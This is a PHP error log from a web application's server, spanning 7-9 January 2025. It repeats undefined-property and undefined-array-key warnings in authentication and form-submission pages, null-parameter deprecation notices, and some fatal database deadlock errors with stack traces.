[07-Jan-2025 05:45:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 05:56:24 UTC] PHP Warning: Undefined array key "subtask_id" in /home/emeraadmin/public_html/pages/submit_form.php on line 10 [07-Jan-2025 05:56:24 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [07-Jan-2025 05:56:24 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [07-Jan-2025 05:56:24 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [07-Jan-2025 05:56:24 UTC] PHP Warning: Undefined array key "notes" in /home/emeraadmin/public_html/pages/submit_form.php on line 15 [07-Jan-2025 05:56:24 UTC] PHP Warning: Undefined array key "clientName" in /home/emeraadmin/public_html/pages/submit_form.php on line 16 [07-Jan-2025 05:56:24 UTC] PHP Warning: Undefined array key "staffName" in /home/emeraadmin/public_html/pages/submit_form.php on line 17 [07-Jan-2025 05:56:24 UTC] PHP Warning: Undefined array key "clientSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 18 [07-Jan-2025 05:56:24 UTC] PHP Warning: Undefined array key "staffSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 19 [07-Jan-2025 05:56:24 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [07-Jan-2025 05:56:24 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [07-Jan-2025 06:09:52 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 06:17:46 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 06:40:05 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 06:40:54 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 06:44:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 06:48:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 07:12:13 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 08:40:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 09:51:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 09:52:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 09:52:52 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 11:09:37 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 20:00:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 20:44:28 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 20:45:06 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 20:45:21 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 20:45:39 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 20:45:54 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 23:01:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 23:08:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [07-Jan-2025 23:12:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 23:12:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 23:13:44 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 23:14:04 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [07-Jan-2025 23:19:41 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 00:41:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 00:56:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 00:58:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 01:12:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 01:28:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 01:29:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 01:30:16 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 01:30:33 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 01:30:49 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 01:31:01 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 01:44:20 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 02:02:19 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 02:02:31 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 02:02:41 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 02:04:18 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 02:05:16 UTC] PHP Warning: Undefined array key "subtask_id" in /home/emeraadmin/public_html/pages/submit_form.php on line 10 [08-Jan-2025 02:05:16 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [08-Jan-2025 02:05:16 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [08-Jan-2025 02:05:16 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [08-Jan-2025 02:05:16 UTC] PHP Warning: Undefined array key "notes" in /home/emeraadmin/public_html/pages/submit_form.php on line 15 [08-Jan-2025 02:05:16 UTC] PHP Warning: Undefined array key "clientName" in /home/emeraadmin/public_html/pages/submit_form.php on line 16 [08-Jan-2025 02:05:16 UTC] PHP Warning: Undefined array key "staffName" in /home/emeraadmin/public_html/pages/submit_form.php on line 17 [08-Jan-2025 02:05:16 UTC] PHP Warning: Undefined array key "clientSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 18 [08-Jan-2025 02:05:16 UTC] PHP Warning: Undefined array key "staffSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 19 [08-Jan-2025 02:05:16 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [08-Jan-2025 02:05:16 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [08-Jan-2025 02:05:50 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 02:06:23 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 02:06:41 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 02:16:53 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 02:25:06 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 02:26:18 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 02:26:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 02:26:54 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 02:27:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 02:27:31 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 02:27:42 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 02:30:06 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 02:32:20 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [08-Jan-2025 02:32:20 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [08-Jan-2025 02:32:20 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [08-Jan-2025 02:32:20 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [08-Jan-2025 02:32:20 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [08-Jan-2025 02:55:34 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 03:02:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 03:30:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 03:31:04 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 04:03:18 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [08-Jan-2025 04:03:18 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [08-Jan-2025 04:03:18 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [08-Jan-2025 04:03:18 UTC] PHP Warning: Undefined array key "staffSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 19 [08-Jan-2025 04:03:18 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [08-Jan-2025 04:03:18 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [08-Jan-2025 04:31:50 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 04:35:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 05:30:29 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 05:32:51 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 05:43:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 05:44:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 05:50:28 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 05:50:48 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 06:14:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 06:15:22 UTC] PHP Warning: Undefined array key "subtask_id" in /home/emeraadmin/public_html/pages/submit_form.php on line 10 [08-Jan-2025 06:15:22 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [08-Jan-2025 06:15:22 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [08-Jan-2025 06:15:22 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [08-Jan-2025 06:15:22 UTC] PHP Warning: Undefined array key "notes" in /home/emeraadmin/public_html/pages/submit_form.php on line 15 [08-Jan-2025 06:15:22 UTC] PHP Warning: Undefined array key "clientName" in /home/emeraadmin/public_html/pages/submit_form.php on line 16 [08-Jan-2025 06:15:22 UTC] PHP Warning: Undefined array key "staffName" in /home/emeraadmin/public_html/pages/submit_form.php on line 17 [08-Jan-2025 06:15:22 UTC] PHP Warning: Undefined array key "clientSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 18 [08-Jan-2025 06:15:22 UTC] PHP Warning: Undefined array key "staffSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 19 [08-Jan-2025 06:15:22 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [08-Jan-2025 06:15:22 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [08-Jan-2025 06:29:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 06:45:48 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 06:46:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 07:14:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 07:55:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 08:31:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 08:33:10 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 15:20:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 15:21:24 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 15:21:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 15:21:47 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 15:22:03 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 21:02:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 21:06:37 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 21:06:50 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 21:07:01 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [08-Jan-2025 23:32:48 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 23:49:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 23:49:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [08-Jan-2025 23:51:38 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 00:21:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 00:21:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 00:34:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 00:56:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 01:33:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 02:19:06 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 02:58:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 02:59:29 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 03:10:26 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 03:12:13 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 03:12:49 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 03:13:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 03:13:51 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 03:18:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 04:16:45 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 04:46:49 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 05:14:59 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 05:25:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 05:34:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 05:35:16 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 05:50:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 05:57:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 06:27:18 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[40001]: Serialization failure: 1213 Deadlock found when trying to get lock; try restarting transaction in /home/emeraadmin/public_html/Classes/Database.php:78 Stack trace: #0 /home/emeraadmin/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/emeraadmin/public_html/Service/TaskFormService.php(32): Database->execute() #2 /home/emeraadmin/public_html/pages/submit_form.php(40): TaskFormService->insertTaskForm(Object(TaskForm)) #3 {main} thrown in /home/emeraadmin/public_html/Classes/Database.php on line 78 [09-Jan-2025 06:27:35 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[40001]: Serialization failure: 1213 Deadlock found when trying to get lock; try restarting transaction in /home/emeraadmin/public_html/Classes/Database.php:78 Stack trace: #0 /home/emeraadmin/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/emeraadmin/public_html/Service/TaskFormService.php(32): Database->execute() #2 /home/emeraadmin/public_html/pages/submit_form.php(40): TaskFormService->insertTaskForm(Object(TaskForm)) #3 {main} thrown in /home/emeraadmin/public_html/Classes/Database.php on line 78 [09-Jan-2025 06:27:35 UTC] PHP Fatal error: Uncaught PDOException: SQLSTATE[40001]: Serialization failure: 1213 Deadlock found when trying to get lock; try restarting transaction in /home/emeraadmin/public_html/Classes/Database.php:78 Stack trace: #0 /home/emeraadmin/public_html/Classes/Database.php(78): PDOStatement->execute() #1 /home/emeraadmin/public_html/Service/TaskFormService.php(32): Database->execute() #2 /home/emeraadmin/public_html/pages/submit_form.php(40): TaskFormService->insertTaskForm(Object(TaskForm)) #3 {main} thrown in /home/emeraadmin/public_html/Classes/Database.php on line 78 [09-Jan-2025 06:27:43 UTC] PHP Warning: Undefined array key "subtask_id" in /home/emeraadmin/public_html/pages/submit_form.php on line 10 [09-Jan-2025 06:27:43 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [09-Jan-2025 06:27:43 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [09-Jan-2025 06:27:43 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [09-Jan-2025 06:27:43 UTC] PHP Warning: Undefined array key "notes" in /home/emeraadmin/public_html/pages/submit_form.php on line 15 [09-Jan-2025 06:27:43 UTC] PHP Warning: Undefined array key "clientName" in /home/emeraadmin/public_html/pages/submit_form.php on line 16 [09-Jan-2025 06:27:43 UTC] PHP Warning: Undefined array key "staffName" in /home/emeraadmin/public_html/pages/submit_form.php on line 17 [09-Jan-2025 06:27:43 UTC] PHP Warning: Undefined array key "clientSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 18 [09-Jan-2025 06:27:43 UTC] PHP Warning: Undefined array key "staffSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 19 [09-Jan-2025 06:27:43 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [09-Jan-2025 06:27:43 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [09-Jan-2025 06:28:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 06:30:00 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 06:35:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 06:36:15 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 06:42:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 06:48:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 06:54:04 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/completedsubtaskform.php on line 212 [09-Jan-2025 06:54:04 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/completedsubtaskform.php on line 216 [09-Jan-2025 06:54:05 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/completedsubtaskform.php on line 212 [09-Jan-2025 06:54:05 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/completedsubtaskform.php on line 216 [09-Jan-2025 07:02:07 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 07:02:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 09:06:53 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 09:08:49 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 09:08:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 09:09:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 09:09:17 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 09:09:28 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [09-Jan-2025 09:18:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [09-Jan-2025 15:11:12 UTC] PHP Warning: Undefined property: stdClass::$status in 